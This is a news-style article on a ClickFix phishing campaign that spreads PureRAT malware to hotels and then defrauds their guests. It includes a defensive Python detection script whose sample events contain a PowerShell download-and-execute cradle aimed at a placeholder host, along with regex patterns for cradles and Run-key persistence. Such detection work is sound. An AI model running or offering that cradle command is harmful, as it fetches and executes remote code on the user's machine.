ClickFix Phishing Campaign Hits Hotels with PureRAT Malware, Targeting Booking Systems and Customer Data

Massive ClickFix Phishing Campaign Targets Hotel Industry with PureRAT Malware

A significant phishing campaign has been identified, targeting the hospitality sector by deploying the ClickFix social engineering technique to distribute PureRAT malware. This operation aims to compromise hotel management systems, leading to unauthorized access to booking platforms such as Booking.com and Expedia.

Attack Methodology

The attackers initiate their scheme by sending spear-phishing emails from compromised accounts, impersonating reputable booking services. These emails contain links that redirect recipients to fraudulent websites designed to mimic legitimate platforms. Upon visiting these sites, users encounter a fake reCAPTCHA challenge, a hallmark of the ClickFix tactic. This deceptive method instructs users to execute a PowerShell command, which subsequently downloads and installs the PureRAT malware.

Capabilities of PureRAT

Once installed, PureRAT grants attackers extensive control over the infected system. Its features include:

– Remote Access: Enables unauthorized entry into the system.

– Input Control: Allows manipulation of mouse and keyboard inputs.

– Surveillance: Captures webcam and microphone data.

– Keylogging: Records keystrokes to capture sensitive information.

– File Management: Supports uploading and downloading of files.

– Traffic Proxying: Routes network traffic through the compromised system.

– Data Exfiltration: Extracts data from the infected host.

– Command Execution: Executes remote commands or binaries.

To evade detection and complicate analysis, PureRAT is obfuscated with .NET Reactor. It establishes persistence by creating a Run registry key, so the implant is relaunched each time the user logs on.
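The two host-side traces this article describes, a user-executed PowerShell download command (the ClickFix step) and a Run-key autostart entry, are what a defender would hunt for. The following is an added detection example, not code from the article or from any vendor's report; it runs over constructed Sysmon-style events (process creation and registry set), and the assumption that a ClickFix command shows up as powershell.exe launched interactively from explorer.exe is the author's, not a detail the article states.

```python
import re

# Constructed Sysmon-style events for illustration (not from the article or any real incident).
# id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr https://verify.example.invalid/check | iex"'},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\frontdesk\AppData\Roaming\upd\svc.exe"},
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
]

# Markers of a pasted download cradle: hidden window, encoded/inline command, web fetch, in-memory eval.
CRADLE = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|iwr|invoke-webrequest|"
                    r"downloadstring|invoke-expression|\biex\b|https?://)", re.I)
# Autostart values pointing at user-writable paths or a script host are the Run-key persistence pattern.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
SUSPECT_PATH = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\|powershell|mshta|wscript|cscript", re.I)

def classify(event):
    """Return a finding label for one event, or None if it looks benign."""
    if event["id"] == 1 and event["image"].lower().endswith("powershell.exe"):
        # Assumption: an interactive launch from the desktop shell is how a user-run ClickFix command appears.
        shell_parent = event["parent"].lower().endswith("explorer.exe")
        hits = {m.group(0).lower() for m in CRADLE.finditer(event["cmd"])}
        if shell_parent and len(hits) >= 2:  # require two markers to keep the rule from firing on plain URLs
            return "clickfix-style powershell cradle"
    if event["id"] == 13 and RUN_KEY.search(event["target"]) and SUSPECT_PATH.search(event["details"]):
        return "run-key persistence"
    return None

def scan(events):
    """Return (evidence, label) pairs for every event that matches a rule."""
    return [(e.get("cmd") or e.get("target"), label) for e in events if (label := classify(e))]

if __name__ == "__main__":
    for item, label in scan(SAMPLE_EVENTS):
        print(f"[{label}] {item}")
```

The benign backup script and the vendor OneDrive autostart are included so the rules can be checked for false positives as well as hits.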

Broader Implications

Beyond compromising hotel management systems, the attackers extend their reach by contacting hotel customers via WhatsApp or email. They use authentic reservation details to build trust, then prompt customers to verify their banking information through malicious links. These links lead to counterfeit Booking.com or Expedia pages designed to harvest financial data.

Cybercriminal Collaboration

Investigations reveal that the perpetrators acquire information about hotel administrators from underground forums like LolzTeam. They often offer a share of the illicit profits to insiders who assist in the scheme. This collaboration involves specialized distributors, known as traffers, who are responsible for disseminating malware.

Conclusion

The hospitality industry’s reliance on digital platforms makes it a prime target for sophisticated phishing campaigns. The use of the ClickFix technique to deploy PureRAT underscores the evolving nature of cyber threats. It is imperative for organizations to enhance their cybersecurity measures, conduct regular staff training, and remain vigilant against such deceptive tactics to safeguard sensitive information and maintain customer trust.